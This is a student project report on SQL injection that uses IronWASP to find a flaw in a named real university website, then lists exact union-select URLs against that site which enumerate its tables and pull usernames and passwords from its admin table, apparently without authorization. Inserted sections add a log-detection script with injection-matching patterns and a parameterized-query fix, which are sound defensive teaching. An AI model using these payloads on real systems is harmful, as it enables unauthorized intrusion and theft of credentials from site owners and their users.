SQL Injection - Project Report


  • 8/10/2019 SQL Injection - Project Report

    1/14


    PREFACE

    It gives me a sense of satisfaction and pleasure at the same time while writing the preface for the IRONWASP project report. It took several weeks of immense hard work and tiredness to complete this project.

    My intention has been to produce a report which covers completely all the aspects of this project. Therefore, I have presented the project report in a way which is accessible to everyone.

    As the use of computers in industry, commerce, education and many other fields of life has become very common, the question of information and system security arises. Avoiding attacks on information and networks wouldn't be that easy. It requires a lot of effort to avoid these attacks. This report discusses SQL injection vulnerability identification and attacking.

    A thorough study has been carried out of the topic. All the material has been collected in relevance to the SQL injection vulnerability. This report is carefully designed to offer information appropriate to the SQL injection vulnerability. All the topics are comprehensively dealt with to give the reader a firm grounding in the issue. Explanations of concepts and principles are concise and written in clear and simple language with supportive illustrations where required. Different diagrams are provided to make this report even more logical and understandable for the reader.

    Muhammad Burhan


    INTRODUCTION

    1 Introduction

    This chapter gives a brief introduction to the project. It provides the objective, theoretical background and project scope.

    1.1 Objective

    The aim of my project is to attack a website using IRONWASP for SQL injection vulnerability detection and then to attack the affected website using SQL injection.

    1.2 Theoretical Background

    What is SQL injection?

    SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

    What is software vulnerability?

    A software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. An example of a software flaw is a buffer overflow.

    What is IronWASP?


    IronWASP (Iron Web application Advanced Security testing Platform) is one of the world's best web vulnerability scanners.

    1.3 Project Scope

    1- To understand and demonstrate the working of Iron Wasp.

    2- Identify vulnerability using Iron Wasp.

    3- Perform attack using SQL Injection.


    Figure 1: Iron WASP Interface

    2.2 Reasons for Iron WASP Selection

    1- It's free and open source.

    2- GUI based and very easy to use, no security expertise required.

    3- Powerful and effective scanning engine.

    4- Supports recording login sequences.

    5- Reporting in both HTML and RTF formats.

    6- Checks for over 25 different kinds of web vulnerabilities.

    7- False positive detection support.

    8- False negative detection support.

    9- Industry leading built-in scripting engine that supports Python and Ruby.

    10- Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.

    11- Comes bundled with a growing number of modules built by researchers in the security community.


    The university offers several undergraduate programs (BS, BSc, BBA, etc.) as well as graduate programs (MBA, etc.). Figure 3 shows the SQL injection vulnerability detected on the university website (i.e. http://www.thelaureate.edu.pk).

    Figure 2: Target website.

    Figure 3: SQL Injection Vulnerability Detected

    2.3 Start Attack

    Step 1: Use the order by clause to find the number of columns in the table.

    Use the order by clause and increase the column number 1, 2, 3 ... n until you get an error. For example:


    http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1

    http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2

    http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3

    ...

    http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7

    Figure 4 shows that on the 7th column we get the following error, which means that the table displaying the data has only 6 columns.

    Figure 4: Shows the error on the 7th column.

    Step 2: Finding the columns that are displayed on the page.

    To find the columns that are displayed on the web page we use a union query, for example:

    http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1

    Figure 5: Displayed Columns.

    Step 3: Using the group_concat function.

    The group_concat function is used to display all table names of the given schema. For example:


    http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1

    The above link displayed the following tables belonging to the current schema: admin, e-news, email_group, email_management, image_gallery, images_listing, navigation, navigation_bk, news_and_events, notice_board and pages.

    Figure 6: Table names.

    Step 4: Find the hex of the target table.

    We have to enter the hex code of the table name in the query to execute it successfully. The admin table looks more interesting. Therefore I find the hex code of admin, which is 61646d696e.

    Step 5: Finding the column names of the table.

    group_concat will be used to display the column names. For example:

    http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1

    Figure 7: Shows the column names of the admin table.

    Step 6: Retrieving data.

    In the last step I successfully retrieved the column names (i.e. username and password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results of the admin table.


    http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1

    Figure 8: Shows the data of admin table.

    Step 7: Beyond this is not ethical.

    I feel that moving ahead, like deleting, modifying and inserting data into tables, is not ethical.
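Steps 1 to 6 leave a distinctive trail in the web server's access log: a numeric id parameter that suddenly carries "order by 1", "order by 2", ... then "union select 1,2,3,4,5,6", then references to information_schema and group_concat. The following is an added example, not part of the report, showing how a defender can pick that sequence out of Apache combined-format log lines. The log lines, IP addresses and the rule names (ORDER_BY_PROBE, UNION_SELECT, SCHEMA_ENUM) are constructed for this example; the request shapes mirror the URLs used in the steps above.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access log (Apache combined format). Addresses are from the
# documentation ranges; the requests mirror the probing sequence in Steps 1-3.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Oct/2019:10:01:02 +0500] "GET /contents.php?id=10 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Oct/2019:10:01:07 +0500] "GET /contents.php?id=10+order+by+1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Oct/2019:10:01:09 +0500] "GET /contents.php?id=10+order+by+7 HTTP/1.1" 200 4010 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Oct/2019:10:01:15 +0500] "GET /contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Oct/2019:10:01:20 +0500] "GET /contents.php?id=10+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Oct/2019:10:02:00 +0500] "GET /contents.php?id=12 HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Oct/2019:10:02:03 +0500] "GET /search.php?q=students+union+election HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
"""

# One regex per stage of the technique, applied to a decoded, lower-cased parameter value.
RULES = {
    # Step 1: a numeric id followed by "order by N" is a column-count probe.
    "ORDER_BY_PROBE": re.compile(r"^\d+\s+order\s+by\s+\d+$"),
    # Step 2 onwards: the word "union" alone is common English, so require "union [all] select".
    "UNION_SELECT": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    # Steps 3 and 5: enumerating tables and columns from the catalog.
    "SCHEMA_ENUM": re.compile(r"information_schema|group_concat\s*\("),
}

# Minimal parser for the fields we need from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_request(target):
    """Return {param_name: [rule names]} for every query parameter that trips a rule."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already decoded once; a second pass catches double-encoded values.
        decoded = unquote_plus(value).lower()
        rules = [rule for rule, rx in RULES.items() if rx.search(decoded)]
        if rules:
            hits[name] = rules
    return hits


def analyze_log(text):
    """Walk the log and return one finding per (request, parameter) that matched."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production parser would count these
        for param, rules in scan_request(m.group("target")).items():
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "param": param,
                "rules": rules,
            })
    return findings


def summarize_by_ip(findings):
    """Collapse findings to the set of stages each client reached."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["rules"])
    return {ip: sorted(rules) for ip, rules in by_ip.items()}


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["path"], f["param"], ",".join(f["rules"]))
    print(summarize_by_ip(found))
```

A client that trips ORDER_BY_PROBE, then UNION_SELECT, then SCHEMA_ENUM within a few seconds has walked the whole procedure; that progression, rather than any single match, is what deserves an alert. The benign "students union election" query shows why the UNION rule insists on "union ... select". Status codes are parsed but not used here: the report's Step 1 relies on the application returning an error on the seventh column, so correlating the probe with a change in response size or status is a natural refinement.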

    Chapter 3

    CONCLUSION

    3 Conclusion

    As you have seen, I demonstrated the SQL injection technique. So we can insert, update and delete any data, as well as database objects (like tables, views etc.), using SQL injection.

    Therefore desktop and web applications should be built to standards in order to avoid attacks. Nowadays there are several software products available which show the presence of vulnerabilities in web and desktop applications.
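The "standard" that would have closed this particular hole is a single one: never build SQL text out of request parameters. Every URL in chapter 2 works only because the value of contents.php?id= is pasted into a query. The following is an added example, not the site's code and not part of the report: a hypothetical page handler written the vulnerable way next to the same handler written with a bound parameter and input validation, run against a constructed in-memory SQLite database. The pages and admin tables and their rows are made up for the example; only the table names follow the report.

```python
import sqlite3

# Constructed stand-in for the site's database: a content table that a page
# handler would read, plus the admin table the report ends up reading.
# Row values are made up; only the table and column names follow the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (10, 'About', 'About the university');
        INSERT INTO admin VALUES ('admin', 'example-secret');
    """)
    return conn


# Hypothetical vulnerable handler: the id value from the URL becomes SQL text,
# which is the only way a request like id=10+union+select+... can succeed.
def fetch_page_vulnerable(conn, page_id):
    sql = "SELECT id, title, body FROM pages WHERE id=" + page_id
    return conn.execute(sql).fetchall()


# Fix 1: bind the value as a parameter. The driver passes it as data, never as
# SQL, so the whole string "10 UNION SELECT ..." is compared against id as one
# literal value and matches nothing.
def fetch_page_safe(conn, page_id):
    sql = "SELECT id, title, body FROM pages WHERE id=?"
    return conn.execute(sql, (page_id,)).fetchall()


# Fix 2, defence in depth: an id is an integer, so reject anything else before
# it gets near the query layer.
def validate_page_id(page_id):
    if not page_id.isdigit():
        raise ValueError("page id must be a positive integer, got %r" % page_id)
    return int(page_id)


# The shape of the report's Step 6 payload, reduced to the three columns this
# toy query selects (the report's query had six).
INJECTED_ID = "10 UNION SELECT 1, username, password FROM admin"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", fetch_page_vulnerable(db, INJECTED_ID))  # admin row appears
    print("parameterized:", fetch_page_safe(db, INJECTED_ID))        # []
    try:
        validate_page_id(INJECTED_ID)
    except ValueError as err:
        print("validation:   ", err)
```

Parameter binding alone defeats the injection; the integer check is there so that a malformed id is rejected and logged at the edge instead of silently returning an empty page. The same two measures apply to the PHP/MySQL stack the report targets (prepared statements with bound parameters, plus type checks on the id), since the mechanism is the same: the database must never see user input as part of the statement text.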


    APPENDIX A

    WEB REFERENCES

    [1] http://www.thelaureate.edu.pk (Target Website)

    [2] http://string-functions.com/string-hex.aspx (Convert String to Hex)
